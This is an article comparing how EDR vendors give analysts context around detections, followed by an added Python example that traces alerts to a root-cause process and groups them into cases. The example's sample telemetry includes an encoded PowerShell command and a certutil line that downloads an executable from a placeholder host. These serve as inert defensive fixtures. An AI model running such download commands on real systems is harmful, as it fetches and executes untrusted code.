Context is an important factor in responding to potential bad actors and events: it helps analysts understand what a given detection means, whether it matters, and how it relates to other events captured in the platform. Many of the major players step in to fill this need. Here are some of them, in no particular order.
VMware Carbon Black offers endpoint protection that can be bumped up with their Managed Detection and Response service. They furnish context for root cause to help speed up response.
CrowdStrike's EDR solution, Falcon, provides several options for threat hunting, among which is its Investigate App. You need the in-house expertise to take advantage of it, but it lets you search for indicators of compromise across your estate and drill down to explore the context around suspicious activity.
McAfee (now Trellix) MVISION emphasizes its real-time monitoring in which event information is sent to the cloud to help add the context needed to dig up threats. It also allows you to implement a device history search for a specific endpoint.
SentinelOne's threat-hunting solution comes from what it calls its Storylines technology, which is updated in real time. It presents data within a framework of relationships and context for root cause analysis, so you can follow the complete chain of events that occurred on an endpoint.
Cybereason is another option to consider with what it calls its instant delivery of context-rich attack intelligence. This platform underscores its ability to condense alerts through what is called its MalOp functionality and provides full context around every detection.
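The vendor descriptions above share two ideas: tracing a detection back along the process tree to the event that started the chain (root cause), and condensing several alerts that share that root into one case. The following is an added example, not code from the article or from any vendor it names, that shows both on a constructed, in-memory sample of process-creation telemetry from one host. The event fields, the alert format and the rule names are assumptions made for this example.

```python
"""Build investigation context around an endpoint detection.

Added example (not from the article or any vendor named in it). It walks a
constructed sample of process-creation events, traces an alerted process back
to its root cause, and condenses alerts that share a root into one case.
Event fields and alert format are assumptions for this example.
"""
from collections import defaultdict

# Constructed sample telemetry: process-creation events from one host.
EVENTS = [
    {"ts": 1, "pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"ts": 2, "pid": 200, "ppid": 100, "image": "outlook.exe",    "cmd": "outlook.exe"},
    {"ts": 3, "pid": 300, "ppid": 200, "image": "winword.exe",    "cmd": "winword.exe invoice.docm"},
    {"ts": 4, "pid": 400, "ppid": 300, "image": "powershell.exe", "cmd": "powershell -enc AAAA"},
    {"ts": 5, "pid": 500, "ppid": 400, "image": "certutil.exe",   "cmd": "certutil -urlcache -f http://example.invalid/a.exe a.exe"},
    {"ts": 6, "pid": 600, "ppid": 100, "image": "notepad.exe",    "cmd": "notepad.exe"},
]

# Constructed alerts; each points at the pid that triggered a (hypothetical) rule.
ALERTS = [
    {"id": "A1", "pid": 400, "rule": "encoded PowerShell command line"},
    {"id": "A2", "pid": 500, "rule": "certutil used to download a file"},
    {"id": "A3", "pid": 600, "rule": "benign test rule"},
]


def index_processes(events):
    """Map pid -> process-creation event for quick parent lookups."""
    return {e["pid"]: e for e in events}


def ancestry(procs, pid):
    """Chain of events from the oldest known ancestor down to pid.

    Stops when the parent is unknown or a cycle is detected (pid reuse).
    """
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid]["ppid"]
    chain.reverse()
    return chain


def root_cause(procs, pid, shells=("explorer.exe",)):
    """The first ancestor below the user shell: the process that began the chain."""
    chain = ancestry(procs, pid)
    for e in chain:
        if e["image"] not in shells:
            return e
    return chain[-1] if chain else None


def condense(procs, alerts):
    """Group alerts that share a root-cause process into a single case.

    Each case carries every process on the paths from the root to the
    alerted processes, sorted by time, so an analyst sees one story
    rather than one alert per rule.
    """
    cases = defaultdict(lambda: {"alerts": [], "chain": []})
    for a in alerts:
        root = root_cause(procs, a["pid"])
        case = cases[root["pid"] if root else None]
        case["alerts"].append(a["id"])
        known = {e["pid"] for e in case["chain"]}
        for e in ancestry(procs, a["pid"]):
            if e["pid"] not in known:
                case["chain"].append(e)
                known.add(e["pid"])
        case["chain"].sort(key=lambda e: e["ts"])
    return dict(cases)


def describe(case):
    """Render one case as a timeline of indented process lines."""
    return [f"{e['ts']:>3}  pid={e['pid']:<4} {e['image']}: {e['cmd']}" for e in case["chain"]]


if __name__ == "__main__":
    procs = index_processes(EVENTS)
    for root_pid, case in condense(procs, ALERTS).items():
        print(f"case rooted at pid {root_pid}, alerts {case['alerts']}")
        for line in describe(case):
            print("   ", line)
```

Run as a script, the two PowerShell and certutil alerts fold into one case rooted at outlook.exe, with the Word document between them on the timeline, while the notepad alert stays separate. The shell list passed to `root_cause` is the knob that decides where a chain "starts"; in real telemetry you would also have to handle pid reuse and events missing from the window, which is why `ancestry` guards against cycles and unknown parents.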
A business endpoint is any device (such as mobile phone, desktop, laptop, tablet, server, or any virtual environment) that is physically an endpoint on a business’s enterprise computer network.